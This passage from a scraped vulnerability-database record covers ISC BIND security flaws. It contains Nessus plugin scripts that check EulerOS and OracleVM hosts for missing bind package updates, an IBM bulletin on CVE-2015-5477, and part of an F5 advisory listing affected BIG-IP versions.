(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"bind-libs-9.9.4-61.1.h2\",\n \"bind-libs-lite-9.9.4-61.1.h2\",\n \"bind-license-9.9.4-61.1.h2\",\n \"bind-utils-9.9.4-61.1.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif 
(flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-03-27T15:42:17", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Fix CVE-2017-3136 (ISC change 4575)\n\n - Fix CVE-2017-3137 (ISC change 4578)\n\n - Fix and test caching CNAME before DNAME (ISC change 4558)\n\n - Fix CVE-2016-9147 (ISC change 4510)\n\n - Fix regression introduced by CVE-2016-8864 (ISC change 4530)\n\n - Restore SELinux contexts before named restart\n\n - Use /lib or /lib64 only if directory in chroot already exists\n\n - Tighten NSS library pattern, escape chroot mount path\n\n - Fix (CVE-2016-8864)\n\n - Do not change lib permissions in chroot (#1321239)\n\n - Support WKS records in chroot (#1297562)\n\n - Do not include patch backup in docs (fixes #1325081 patch)\n\n - Backported relevant parts of [RT #39567] (#1259923)\n\n - Increase ISC_SOCKET_MAXEVENTS to 2048 (#1326283)\n\n - Fix multiple realms in nsupdate script like upstream (#1313286)\n\n - Fix multiple realm in nsupdate script (#1313286)\n\n - Use resolver-query-timeout high enough to recover all forwarders (#1325081)\n\n - Fix (CVE-2016-2848)\n\n - Fix infinite loop in start_lookup (#1306504)\n\n - Fix (CVE-2016-2776)", "cvss3": {"score": 8.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"}, "published": "2017-04-21T00:00:00", "type": "nessus", "title": "OracleVM 3.3 / 3.4 : bind (OVMSA-2017-0066)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-4095", "CVE-2007-2241", "CVE-2007-2925", "CVE-2007-2926", "CVE-2007-6283", "CVE-2008-0122", "CVE-2008-1447", "CVE-2009-0025", "CVE-2009-0696", "CVE-2010-0097", "CVE-2010-0290", "CVE-2011-0414", 
"CVE-2011-1910", "CVE-2011-2464", "CVE-2012-1033", "CVE-2012-1667", "CVE-2012-3817", "CVE-2012-4244", "CVE-2012-5166", "CVE-2012-5688", "CVE-2012-5689", "CVE-2013-2266", "CVE-2013-4854", "CVE-2014-0591", "CVE-2014-8500", "CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776", "CVE-2016-2848", "CVE-2016-8864", "CVE-2016-9147", "CVE-2017-3136", "CVE-2017-3137"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bind-libs", "p-cpe:/a:oracle:vm:bind-utils", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:oracle:vm_server:3.4"], "id": "ORACLEVM_OVMSA-2017-0066.NASL", "href": "https://www.tenable.com/plugins/nessus/99569", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0066.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99569);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-4095\", \"CVE-2007-2241\", \"CVE-2007-2925\", \"CVE-2007-2926\", \"CVE-2007-6283\", \"CVE-2008-0122\", \"CVE-2008-1447\", \"CVE-2009-0025\", \"CVE-2009-0696\", \"CVE-2010-0097\", \"CVE-2010-0290\", \"CVE-2011-0414\", \"CVE-2011-1910\", \"CVE-2011-2464\", \"CVE-2012-1033\", \"CVE-2012-1667\", \"CVE-2012-3817\", \"CVE-2012-4244\", \"CVE-2012-5166\", \"CVE-2012-5688\", \"CVE-2012-5689\", \"CVE-2013-2266\", \"CVE-2013-4854\", \"CVE-2014-0591\", \"CVE-2014-8500\", \"CVE-2015-1349\", \"CVE-2015-4620\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\", \"CVE-2015-8704\", \"CVE-2016-1285\", \"CVE-2016-1286\", \"CVE-2016-2776\", \"CVE-2016-2848\", \"CVE-2016-8864\", \"CVE-2016-9147\", \"CVE-2017-3136\", \"CVE-2017-3137\");\n script_bugtraq_id(19859, 25037, 27283, 30131, 33151, 35848, 37118, 37865, 46491, 48007, 48566, 51898, 
53772, 54658, 55522, 55852, 56817, 57556, 58736, 61479, 64801, 71590, 72673, 75588);\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"OracleVM 3.3 / 3.4 : bind (OVMSA-2017-0066)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix CVE-2017-3136 (ISC change 4575)\n\n - Fix CVE-2017-3137 (ISC change 4578)\n\n - Fix and test caching CNAME before DNAME (ISC change\n 4558)\n\n - Fix CVE-2016-9147 (ISC change 4510)\n\n - Fix regression introduced by CVE-2016-8864 (ISC change\n 4530)\n\n - Restore SELinux contexts before named restart\n\n - Use /lib or /lib64 only if directory in chroot already\n exists\n\n - Tighten NSS library pattern, escape chroot mount path\n\n - Fix (CVE-2016-8864)\n\n - Do not change lib permissions in chroot (#1321239)\n\n - Support WKS records in chroot (#1297562)\n\n - Do not include patch backup in docs (fixes #1325081\n patch)\n\n - Backported relevant parts of [RT #39567] (#1259923)\n\n - Increase ISC_SOCKET_MAXEVENTS to 2048 (#1326283)\n\n - Fix multiple realms in nsupdate script like upstream\n (#1313286)\n\n - Fix multiple realm in nsupdate script (#1313286)\n\n - Use resolver-query-timeout high enough to recover all\n forwarders (#1325081)\n\n - Fix (CVE-2016-2848)\n\n - Fix infinite loop in start_lookup (#1306504)\n\n - Fix (CVE-2016-2776)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-April/000681.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd826bc7\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-April/000680.html\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"http://www.nessus.org/u?67f77036\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind-libs / bind-utils packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16, 189, 200, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"bind-libs-9.8.2-0.62.rc1.el6_9.1\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"bind-utils-9.8.2-0.62.rc1.el6_9.1\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"bind-libs-9.8.2-0.62.rc1.el6_9.1\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"bind-utils-9.8.2-0.62.rc1.el6_9.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind-libs / bind-utils\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-17T14:18:37", "description": "The remote OracleVM system is missing necessary patches to address critical security updates : please see Oracle VM Security 
Advisory OVMSA-2020-0021 for details.", "cvss3": {"score": 6.8, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"}, "published": "2020-06-05T00:00:00", "type": "nessus", "title": "OracleVM 3.3 / 3.4 : bind (OVMSA-2020-0021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-4095", "CVE-2007-2241", "CVE-2007-2925", "CVE-2007-2926", "CVE-2007-6283", "CVE-2008-0122", "CVE-2008-1447", "CVE-2009-0025", "CVE-2009-0696", "CVE-2010-0097", "CVE-2010-0290", "CVE-2011-0414", "CVE-2011-1910", "CVE-2011-2464", "CVE-2012-1033", "CVE-2012-1667", "CVE-2012-3817", "CVE-2012-4244", "CVE-2012-5166", "CVE-2012-5688", "CVE-2012-5689", "CVE-2013-2266", "CVE-2013-4854", "CVE-2014-0591", "CVE-2014-8500", "CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776", "CVE-2016-2848", "CVE-2016-8864", "CVE-2016-9147", "CVE-2017-3136", "CVE-2017-3137", "CVE-2017-3142", "CVE-2017-3143", "CVE-2017-3145", "CVE-2018-5740", "CVE-2018-5743", "CVE-2020-8616", "CVE-2020-8617"], "modified": "2022-05-16T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bind-libs", "p-cpe:/a:oracle:vm:bind-utils", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:oracle:vm_server:3.4"], "id": "ORACLEVM_OVMSA-2020-0021.NASL", "href": "https://www.tenable.com/plugins/nessus/137170", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2020-0021.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137170);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/16\");\n\n script_cve_id(\"CVE-2006-4095\", \"CVE-2007-2241\", \"CVE-2007-2925\", \"CVE-2007-2926\", \"CVE-2007-6283\", \"CVE-2008-0122\", \"CVE-2008-1447\", \"CVE-2009-0025\", \"CVE-2009-0696\", \"CVE-2010-0097\", \"CVE-2010-0290\", \"CVE-2011-0414\", \"CVE-2011-1910\", \"CVE-2011-2464\", \"CVE-2012-1033\", 
\"CVE-2012-1667\", \"CVE-2012-3817\", \"CVE-2012-4244\", \"CVE-2012-5166\", \"CVE-2012-5688\", \"CVE-2012-5689\", \"CVE-2013-2266\", \"CVE-2013-4854\", \"CVE-2014-0591\", \"CVE-2014-8500\", \"CVE-2015-1349\", \"CVE-2015-4620\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\", \"CVE-2015-8704\", \"CVE-2016-1285\", \"CVE-2016-1286\", \"CVE-2016-2776\", \"CVE-2016-2848\", \"CVE-2016-8864\", \"CVE-2016-9147\", \"CVE-2017-3136\", \"CVE-2017-3137\", \"CVE-2017-3142\", \"CVE-2017-3143\", \"CVE-2017-3145\", \"CVE-2018-5740\", \"CVE-2018-5743\", \"CVE-2020-8616\", \"CVE-2020-8617\");\n script_bugtraq_id(19859, 25037, 27283, 30131, 33151, 35848, 37118, 37865, 46491, 48007, 48566, 51898, 53772, 54658, 55522, 55852, 56817, 57556, 58736, 61479, 64801, 71590, 72673, 75588);\n\n script_name(english:\"OracleVM 3.3 / 3.4 : bind (OVMSA-2020-0021)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2020-0021 for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2020-June/000984.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2020-June/000981.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2020-June/000982.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected bind-libs / bind-utils packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2008-0122\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16, 189, 200, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"bind-libs-9.8.2-0.68.rc1.el6_10.7\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"bind-utils-9.8.2-0.68.rc1.el6_10.7\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"bind-libs-9.8.2-0.68.rc1.el6_10.7\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"bind-utils-9.8.2-0.68.rc1.el6_10.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind-libs / bind-utils\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2021-12-30T21:52:07", "description": "## Summary\n\nBIND vulnerability disclosed by Internet Systems Consortium (ISC) affects IBM Netezza Host Management. IBM Netezza Host Management has addressed this CVE.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2015-5477](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477>) \n \n**DESCRIPTION:** ISC BIND is vulnerable to a denial of service, caused by an error in the handling of TKEY queries. By sending specially-crafted packets, a remote attacker could exploit this vulnerability to cause a REQUIRE assertion failure. 
\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/105120> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM Netezza Host Management 5.3.7.0 and previous releases\n\n## Remediation/Fixes\n\nIBM Netezza Host Management\n\n| _5.3.8.0_| [Link to Fix Central](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%2BManagement&product=ibm/Information+Management/Netezza+Platform&release=HOSTMGMT_5&platform=All&function=fixId&fixids=5.3.8.0-IM-Netezza-HOSTMGMT-fp101635&includeRequisites=1&includeSupersedes=0&downloadMethod=http&source=fc>) \n---|---|--- \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n21 August 2015: Original version published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSULQD\",\"label\":\"IBM PureData System\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"1.0.0\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {}, "published": "2019-10-18T03:10:29", "type": "ibm", "title": "Security Bulletin: Vulnerability in BIND affects IBM Netezza Host Management (CVE-2015-5477)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2019-10-18T03:10:29", "id": "1BE927991B41331733ECF7540C1316ECEB24FDB717143A7513A6233D44D77714", "href": "https://www.ibm.com/support/pages/node/535249", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], 
"f5": [{"lastseen": "2017-06-08T00:16:31", "description": "\nF5 Product Development has assigned ID 534630 to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H535739 on the **Diagnostics **> **Identified **> **High **screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.6.0**1** \n11.0.0 - 11.5.3**1** \n10.1.0 - 10.2.4| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \n11.6.0**2 ** \n11.2.0 - 11.5.3**2 **| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n11.0.0 - 11.1.0 \n10.1.0 - 10.2.4| Severe| BIND \nBIG-IP AAM| 11.6.0**1** \n11.4.0 - 11.5.3**1**| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9| Severe| BIND \nBIG-IP AFM| 11.6.0**1** \n11.3.0 - 11.5.3**1**| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9| Severe| BIND \nBIG-IP Analytics| 11.6.0**1** \n11.0.0 - 11.5.3**1**| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15| Severe| BIND \nBIG-IP APM| 11.6.0**1** \n11.0.0 - 11.5.3**1** \n10.1.0 - 10.2.4| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP ASM| 11.6.0**1** \n11.0.0 - 11.5.3**1** \n10.1.0 - 10.2.4| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0**1** \n10.1.0 - 10.2.4| 11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP GTM| 11.6.0**1,2,3** \n11.0.0 - 
11.5.3**1,2,3** \n10.1.0 - 10.2.4| 11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP Link Controller| 11.6.0**1,2,3** \n11.0.0 - 11.5.3**1,2,3** \n10.1.0 - 10.2.4| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP PEM| 11.6.0**1** \n11.3.0 - 11.5.3**1**| 12.0.0 \n11.6.0 HF6 \n11.5.4 \n11.5.3 HF2 \n11.4.1 HF9| Severe| BIND \nBIG-IP PSM| 11.0.0 - 11.4.1**1** \n10.1.0 - 10.2.4| 11.4.1 HF9 \n11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0**1** \n10.1.0 - 10.2.4| 11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nBIG-IP WOM| 11.0.0 - 11.3.0**1** \n10.1.0 - 10.2.4| 11.2.1 HF15 \n10.2.4 HF12| Severe| BIND \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.1.1**4**| None| Low| BIND \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0**4**| None| Low| BIND \nBIG-IQ Device| 4.2.0 - 4.5.0**4**| None| Low| BIND \nBIG-IQ Security| 4.0.0 - 4.5.0**4**| None| Low| BIND \nBIG-IQ ADC| 4.5.0**4**| None| Low| BIND \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n \n**1**These versions are vulnerable if a self IP address or management IP address is configured to allow inbound connections on port 53. \n\n**2**These versions are vulnerable if a DNS profile is configured with the **Use BIND Server on BIG-IP** option (enabled by default). 
